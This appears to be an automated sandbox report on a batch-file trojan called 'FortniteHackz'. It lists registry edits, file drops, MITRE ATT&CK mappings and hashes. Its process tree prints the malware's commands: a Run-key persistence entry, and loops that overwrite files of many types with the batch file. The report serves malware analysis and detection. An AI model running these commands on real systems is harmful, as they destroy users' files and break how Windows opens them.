File created	C:\Windows\WinSxS\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.19041.844_none_d9eb415c5b9dbe4e\BadgeLogo.contrast-white_scale-100.png	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-ui-shellcommon-core_31bf3856ad364e35_10.0.19041.1_none_91b1f58702057373\WiFiNetworkManagerToast.scale-150_contrast-black.png	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.19041.1_it-it_f8576122041e54e0\Report.System.Network.xml	cmd.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.19041.1266_none_4621ad58d5f654dd\Robocopy.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-s..ets.icons.searchapp_31bf3856ad364e35_10.0.19041.1_none_ceba36fd1b479c4c\WideTile.scale-150.png	cmd.exe

Modifies registry class 18 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = "batfile"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.pdf\ = "batfile"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp3\ = "batfile"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "batfile"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.png\ = "batfile"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.doc	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp3	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp4	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp4\ = "batfile"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.doc\ = "batfile"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.txt\ = "batfile"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.png	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.xml	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.xml\ = "batfile"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.pdf	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.txt	cmd.exe

Suspicious use of WriteProcessMemory 50 IoCs

description	pid	Process	procid_target
PID 4980 wrote to memory of 1836	4980	cmd.exe	88
PID 4980 wrote to memory of 1836	4980	cmd.exe	88
PID 4980 wrote to memory of 2668	4980	cmd.exe	92
PID 4980 wrote to memory of 2668	4980	cmd.exe	92
PID 4980 wrote to memory of 4072	4980	cmd.exe	93
PID 4980 wrote to memory of 4072	4980	cmd.exe	93
PID 4980 wrote to memory of 3380	4980	cmd.exe	98
PID 4980 wrote to memory of 3380	4980	cmd.exe	98
PID 4980 wrote to memory of 3760	4980	cmd.exe	99
PID 4980 wrote to memory of 3760	4980	cmd.exe	99
PID 4980 wrote to memory of 3688	4980	cmd.exe	103
PID 4980 wrote to memory of 3688	4980	cmd.exe	103
PID 4980 wrote to memory of 2444	4980	cmd.exe	104
PID 4980 wrote to memory of 2444	4980	cmd.exe	104
PID 4980 wrote to memory of 116	4980	cmd.exe	105
PID 4980 wrote to memory of 116	4980	cmd.exe	105
PID 4980 wrote to memory of 1372	4980	cmd.exe	106
PID 4980 wrote to memory of 1372	4980	cmd.exe	106
PID 4980 wrote to memory of 1836	4980	cmd.exe	108
PID 4980 wrote to memory of 1836	4980	cmd.exe	108
PID 4980 wrote to memory of 3936	4980	cmd.exe	109
PID 4980 wrote to memory of 3936	4980	cmd.exe	109
PID 4980 wrote to memory of 2352	4980	cmd.exe	111
PID 4980 wrote to memory of 2352	4980	cmd.exe	111
PID 4980 wrote to memory of 3424	4980	cmd.exe	112
PID 4980 wrote to memory of 3424	4980	cmd.exe	112
PID 4980 wrote to memory of 4268	4980	cmd.exe	115
PID 4980 wrote to memory of 4268	4980	cmd.exe	115
PID 4980 wrote to memory of 1292	4980	cmd.exe	116
PID 4980 wrote to memory of 1292	4980	cmd.exe	116
PID 4980 wrote to memory of 2240	4980	cmd.exe	117
PID 4980 wrote to memory of 2240	4980	cmd.exe	117
PID 4980 wrote to memory of 2020	4980	cmd.exe	118
PID 4980 wrote to memory of 2020	4980	cmd.exe	118
PID 4980 wrote to memory of 5012	4980	cmd.exe	120
PID 4980 wrote to memory of 5012	4980	cmd.exe	120
PID 4980 wrote to memory of 4668	4980	cmd.exe	121
PID 4980 wrote to memory of 4668	4980	cmd.exe	121
PID 4980 wrote to memory of 2340	4980	cmd.exe	123
PID 4980 wrote to memory of 2340	4980	cmd.exe	123
PID 4980 wrote to memory of 1216	4980	cmd.exe	124
PID 4980 wrote to memory of 1216	4980	cmd.exe	124
PID 4980 wrote to memory of 3576	4980	cmd.exe	126
PID 4980 wrote to memory of 3576	4980	cmd.exe	126
PID 4980 wrote to memory of 2052	4980	cmd.exe	127
PID 4980 wrote to memory of 2052	4980	cmd.exe	127
PID 4980 wrote to memory of 100	4980	cmd.exe	129
PID 4980 wrote to memory of 100	4980	cmd.exe	129
PID 4980 wrote to memory of 2756	4980	cmd.exe	130
PID 4980 wrote to memory of 2756	4980	cmd.exe	130

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4980
- C:\Windows\system32\reg.exe
  reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_7188_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat /f
  2⤵
  - Adds Run key to start application
  PID:1836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:2668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_doc.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:4072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:3380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_lnk.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:3760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:3688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:2444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in Drivers directory
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID:1372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:1836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:3936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:2352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_exe.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID:3424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:4268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in Program Files directory
  PID:1292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:2240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:2020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:5012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID:4668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:2340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:1216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:3576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:2052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:2756

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Microsoft Office\FileSystemMetadata.xml

Filesize
34KB

MD5
4a812cb3bddc8bd1d63252fb8c483b9b

SHA1
7afeabf10ba2994cd8a69cd6ce0d574e9c78d797

SHA256
7deab1b703f5b0a5276ebc7b6c6431754f48608b514af206a2d235bf873a585a

SHA512
8917df6652689e936a55082fe8ace70c415c482a3ece37890c54933ec351e355152ec234fcace948003455ac05c987933f8882cd0e925efb6a602160529d6cc1

Download Submit
C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml

Filesize
34KB

MD5
27aee8043f5ffe3f0f667e28b8879502

SHA1
ec106279a6f518dbad09d70721c3cdf20874975c

SHA256
acd484b2714e2385feb36052c6c3197933c413a902dd705dea69d22e79e94da6

SHA512
0cb9e46a93fb05902a8652462f159a2fce4e1a1922a1a10d054303156cbb6a55047bf39640af8f61b4f63aa42d8b68b4dc12038b2b0c864d8f5886407005a14b

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_doc.txt

Filesize
1KB

MD5
031e426c853451490b60ffeb2fd13539

SHA1
d11935f2872953ef19aa7f1dfbaba0c9954b205f

SHA256
aded8bf1652629e4d75e7baa4bb6963cb42baf5f67265a8551d22c34908416e9

SHA512
e832312b0360cb3eebd19bec7a8ff85666ba497b512e7baf26766c4337b1d4df825de6a69f0d44924502576b0cb4113c36ad62b9bf15545d5b56d661d63ebc19

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_exe.txt

Filesize
541KB

MD5
3dd26776185fd8fe211ed70a11cfe4b0

SHA1
89617456aac9747cbf679c83ac08a9977aa604ff

SHA256
a30d14f22e5d3e9dd80dfd8133b7d01a39131a52a9e003876b66c1d3bdf59e6b

SHA512
75ae6ad9a278264e8a626e7ad295decca80c2db46a33da603feddf4431fda82683ddc15fc9c71f70f5763e791e96b3f73efe4f9e445eb4ae7a283ec575b91328

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_lnk.txt

Filesize
41KB

MD5
025b071cf5ff7d1bcaf8d6a758b4b974

SHA1
b55c871a42df668b1f07e3d214bed009ca0c8a23

SHA256
495c90bbe6555aaf7506ad493b6617580cce8e775652a43a91aef8248b8ba871

SHA512
fca0efa69f8ffc07b6ecb3f3f64fecc727794055af27cd70b44d6409f573e653ae2a0df4ac3ba2c83e0da1be813530b12680fb24a7215dce4540520b93e248f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_mp3.txt

Filesize
160B

MD5
f149377191b51abb3c0514f5a8c87573

SHA1
9533737585b0369533681b025d654178016d4502

SHA256
605d1f5cf8501e16bba22d417749da9319bd7602487913a0cabea85346082b01

SHA512
6a71fc943b77c442cff1c4c4e8d73a1d8a5a4e2ba4442ca7ff38f1dbf115abd16548a08bcb208b92a399207343ec9c3c0a4d6407dc040ad4203de6faaacc66fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_mp4.txt

Filesize
2KB

MD5
199dc21ff9bc7a3174c71540f4a17cf8

SHA1
93d5af17642721ea491004362ca84b08aaffab3d

SHA256
7cc4e699bd1e12f2f60613adf4e395f72b122ce6f79155574bbc8df255ce607c

SHA512
363d1757410e50d1b9a555e72c16fda613bd5bbddf9f19fb37f613bf53cb8a8c0abc64a936dd102190befdb5ec3cd2a152255250961389b4d2d0b1e8bbbc03ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_pdf.txt

Filesize
2KB

MD5
57727573e27460e5daa9445ddd95a541

SHA1
d14cd5d4a9d6e27a02003ee095e4f9b3e587ed62

SHA256
4df68c1fba81b1cf329b4e08610be2a95279b9d9d9a70ec842cdd1ac4d61fc72

SHA512
38d5cd7b4f818f04a7b93adf5aac17582fd356b2541e2fea8b41180aae82c082025e8b3a22b5225dc55aa07f529e6e8e8b4d1bfc8d61aef4d89ab56fb9ab08fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_png.txt

Filesize
1.7MB

MD5
82eb38622551dbe5027277caba1886d3

SHA1
e3858d1f6d0858ecb87a6db3233051db1143eee7

SHA256
7a368f27fd8555b81c08f1f5c2c9455bc4492cd680451fd9b7e4068cb19f9333

SHA512
80d7c1b0d44287ed6ea5847fad0d13b64d57bc550168a1ab3b9aae29f0a423d69059bc802283dfe37efd6759d45aca9bcd66cbfe5c24e329227555bd546bee4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_txt.txt

Filesize
43KB

MD5
e311dc2921ff2679e7a536347824d01a

SHA1
ee55fb3719de270875485e0c51e1207fd86e5676

SHA256
e6ae9adaba9bf85c2b95589f37547dfd8b13ceba4c0f05ca5c6c1c7edbc5b8f1

SHA512
9f7c66ac5d43bda54a2d6a6bcfe1e77f9ce0821235ba1257de4c4c2f9d5c17b82708094190e5a97a3972512c49f78e148141a49330c84d004df699f46bdef8d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_xml.txt

Filesize
349KB

MD5
8bbe092c147ea3c9cf1af49b4adc316e

SHA1
44a3d232670ef1a52f1bcc9ba1581bb039f58ac6

SHA256
ec5353fc9c0f3107230fe9d21f5841f34670e621c3f58e7f617cec340f1f04d7

SHA512
29f93bd3c0a8c8ca2fd930d8b3a28fbcbcbcb1abb4ea437b0b38d035167625260ca6ae70a197f8dd3bd129eb1baeb5361865ce83e37dd8ef9a54fb9f3a482374

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_xml.txt

Filesize
698KB

MD5
95943332ae7c3b0e945b87612a3b8d64

SHA1
9501259e29412d069223c89c4a8d9816b40faa8b

SHA256
0d7e9c66ba0d97fc23dad44913a0034a98af1e08d966ab205ce913be158d5b1f

SHA512
a7241dd3559402ee48840d5f032688c0fc73a2d2ad13c1146f0f51c8351910f77ccb9bf229262e342a11955ace5af9f6c0932cf03b8b6a22610ad1e6fcabd656

Download Submit
C:\Users\Admin\Desktop\RepairPush.docx

Filesize
34KB

MD5
ac04b6f6fa293c4b55c4c8b49372a9ec

SHA1
9dfca519218c3c10203163454f1237916b0655cc

SHA256
273f4b1732968174b95b549e1fec0b61181404b820a0d8f1b8dec9c32686bd92

SHA512
b560feee161c2300b3145026dd5faa0ca3b4edbcaa88a8d68854d26b0c1a6087370af5da707b2fb61c5ca0b363a5786f5e7eeba2ed1fe5ae863347f018889086

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads